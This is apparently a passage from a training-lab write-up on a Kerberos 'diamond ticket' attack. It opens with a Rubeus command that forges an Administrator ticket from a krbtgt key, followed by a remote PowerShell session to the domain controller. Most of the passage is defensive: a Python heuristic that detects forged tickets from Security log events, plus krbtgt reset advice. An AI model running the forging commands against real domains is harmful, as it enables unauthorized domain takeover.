
Now that we have the secrets of the KRBTGT account, let's use Rubeus to execute a Diamond Ticket attack:
.\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

In the new CMD window, open PowerShell, bypass the execution policy, and PS Remote to the domain controller:
Enter-PSSession -ComputerName dcorp-dc

Awesome, I did it!
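From the defender's side, the ticket built above is a re-encryption of the low-privileged user's own TGT (obtained with /tgtdeleg) with the krbtgt key after its PAC has been rewritten. The KDC therefore logs a TGT request (Event 4768) for the original user, never for Administrator, while every service-ticket request (Event 4769) that follows the /ptt names Administrator. The Python below is an added example, not part of the original writeup, that runs exactly that correlation over constructed sample log lines: the field names (EventID, TargetUserName, ServiceName, IpAddress) follow the Security log schema, but the addresses, timestamps, the student1 and svcadmin accounts and the dcorp-std1/dcorp-mgmt hosts are made up; only dcorp-dc and Administrator come from the lab above.

```python
"""Heuristic detection for forged TGTs (golden/diamond tickets) from KDC events.

Added example, not from the original writeup. A forged TGT is never issued by
the KDC, so the account it names requests service tickets (Event 4769) without
ever having requested a TGT (Event 4768) or renewed one (Event 4770).
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Constructed sample log lines. Field names follow the Security log schema for
# 4768/4769/4770; addresses, timestamps, and all names except dcorp-dc and
# Administrator are made up. IpAddress is logged IPv4-mapped (::ffff:...) on
# real DCs, so a couple of lines use that form.
SAMPLE_LOG = """\
2024-03-01T09:00:00 EventID=4768 TargetUserName=student1 IpAddress=172.16.100.1
2024-03-01T09:00:02 EventID=4769 TargetUserName=student1 ServiceName=dcorp-std1$ IpAddress=172.16.100.1
2024-03-01T09:15:00 EventID=4768 TargetUserName=svcadmin IpAddress=172.16.4.44
2024-03-01T09:15:10 EventID=4769 TargetUserName=svcadmin ServiceName=dcorp-mgmt$ IpAddress=172.16.4.44
2024-03-01T09:30:00 EventID=4769 TargetUserName=Administrator ServiceName=dcorp-dc$ IpAddress=::ffff:172.16.100.1
2024-03-01T09:30:01 EventID=4769 TargetUserName=Administrator ServiceName=HTTP/dcorp-dc IpAddress=::ffff:172.16.100.1
"""

# A TGT is valid for 10 hours by default; renewals (Event 4770) extend it.
DEFAULT_WINDOW = timedelta(hours=10)


@dataclass(frozen=True)
class KerbEvent:
    time: datetime
    event_id: int
    account: str            # TargetUserName without realm, lower-cased
    client: str             # IpAddress with any ::ffff: prefix stripped
    service: Optional[str]  # ServiceName, present on 4769/4770 only


def parse_line(line: str) -> KerbEvent:
    """Parse one 'timestamp Key=Value ...' line into a KerbEvent."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return KerbEvent(
        time=datetime.fromisoformat(ts),
        event_id=int(kv["EventID"]),
        account=kv["TargetUserName"].split("@")[0].lower(),
        client=kv["IpAddress"].removeprefix("::ffff:"),
        service=kv.get("ServiceName"),
    )


def parse_log(text: str) -> list[KerbEvent]:
    return [parse_line(ln) for ln in text.splitlines() if ln.strip()]


@dataclass
class Finding:
    account: str
    client: str
    first_seen: datetime
    tgs_count: int
    # Accounts that DID obtain a TGT from the same client. For a diamond
    # ticket this points at the low-privileged user whose real TGT was
    # decrypted, modified and re-encrypted.
    tgt_accounts_from_client: set[str]


def tgs_without_tgt(events: list[KerbEvent],
                    window: timedelta = DEFAULT_WINDOW) -> list[Finding]:
    """Flag 4769s whose account had no 4768, or TGT renewal 4770, within `window`."""
    last_tgt: dict[str, datetime] = {}       # account -> last TGT issue/renewal
    tgt_by_client: dict[str, set[str]] = {}  # client -> accounts it got TGTs for
    findings: dict[tuple[str, str], Finding] = {}
    for ev in sorted(events, key=lambda e: e.time):
        is_tgt_renewal = ev.event_id == 4770 and bool(ev.service) and ev.service.startswith("krbtgt")
        if ev.event_id == 4768 or is_tgt_renewal:
            last_tgt[ev.account] = ev.time
            tgt_by_client.setdefault(ev.client, set()).add(ev.account)
        elif ev.event_id == 4769:
            seen = last_tgt.get(ev.account)
            if seen is not None and ev.time - seen <= window:
                continue  # ordinary case: TGS request backed by a KDC-issued TGT
            key = (ev.account, ev.client)
            if key in findings:
                findings[key].tgs_count += 1
            else:
                findings[key] = Finding(ev.account, ev.client, ev.time, 1,
                                        set(tgt_by_client.get(ev.client, ())))
    return list(findings.values())


if __name__ == "__main__":
    for f in tgs_without_tgt(parse_log(SAMPLE_LOG)):
        print(f"{f.first_seen.isoformat()} {f.account} from {f.client}: "
              f"{f.tgs_count} TGS request(s) with no TGT; "
              f"TGTs from this client: {sorted(f.tgt_accounts_from_client)}")
```

The heuristic only works on Security logs collected centrally from every domain controller, because a client's AS-REQ and its later TGS-REQs can be served by different DCs. Sessions whose TGT predates the collection window, or that keep renewing past it, show up as false positives, so the window and the 4770 handling need tuning per environment. Detection after the fact does not revoke anything: once a krbtgt key has leaked, the ticket-forging capability is only removed by resetting the krbtgt password twice (with replication in between), which invalidates tickets under both the current and the previous key.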